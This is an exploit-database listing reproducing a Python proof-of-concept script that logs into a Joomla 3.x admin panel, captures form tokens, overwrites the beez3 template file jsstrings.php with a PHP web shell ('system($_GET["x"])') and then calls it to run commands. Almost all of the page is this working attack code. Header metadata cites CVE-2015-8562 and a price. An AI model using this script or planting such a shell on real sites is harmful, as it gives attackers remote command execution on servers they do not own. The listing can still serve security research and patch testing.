Joomla 3.x Proof Of Concept Shell Upload
CVE
Category
Price
Severity
CVE-2015-8562
CWE-434
$500
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2017-05-31
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017060001 Below is a copy:
Joomla 3.x Proof Of Concept Shell Upload c@kali:~/src/napalm2.2/modules$ cat shell-joomla.py
#!/usr/bin/env python
# joomla_shellup.py - small script to upload shell in Joomla
#
# 02.05.2017, rewrited: 27.05
# -- hint --
# To exploit this "feature" you will need valid credentials.'
# Based on latest (3.6.5-1) version.'
# Tested also on: 3.7.x
import requests
import re
target = raw_input("[+] Hostname >> ")
print '[+] Checking: ' + str(target)
# initGET
session = requests.session()
initlink = target + '/administrator/index.php'
initsend = session.get(initlink)
initresp = initsend.text
find_token = re.compile('<input type="hidden" name="(.*?)" value="1"/>')
found_token = re.search(find_token, initresp)
if found_token:
initToken = found_token.group(1)
print '[+] Found init token: ' + initToken
print '[+] Preparing login request'
data_login = {
'username':'user',
'passwd':'bitnami',
'lang':'',
'option':'com_login',
'task':'login',
'return':'aW5kZXgucGhw',
initToken:'1'
}
data_link = initlink
doLogin = session.post(data_link, data=data_login)
loginResp = doLogin.text
print '[+] At this stage we should be logged-in as an admin :)'
uplink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D'
filename = 'jsstrings.php'
print '[+] File to change: ' + str(filename)
getnewtoken = session.get(uplink)
getresptoken = getnewtoken.text
newToken = re.compile('<input type="hidden" name="(.*?)" value="1"/>')
newFound = re.search(newToken, getresptoken)
if newFound:
newOneTok = newFound.group(1)
print '[+] Grabbing new token from logged-in user: ' + newOneTok
getjs = target+'/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D'
getjsreq = session.get(getjs)
getjsresp = getjsreq.text
# print getjsresp
print '[+] Shellname: ' + filename
shlink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA='
shdata_up = {
'jform[source]':'<?php system($_GET["x"]);',
'task':'template.apply',
newOneTok:'1',
'jform[extension_id]':'503',
'jform[filename]':'/'+filename
}
shreq = session.post(shlink, data=shdata_up)
path2shell = '/templates/beez3/jsstrings.php?x=id'
print '[+] Shell is ready to use: ' + str(path2shell)
print '[+] Checking:'
shreq = session.get(target + path2shell)
shresp = shreq.text
print shresp
print '\n[+] Module finished.'
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum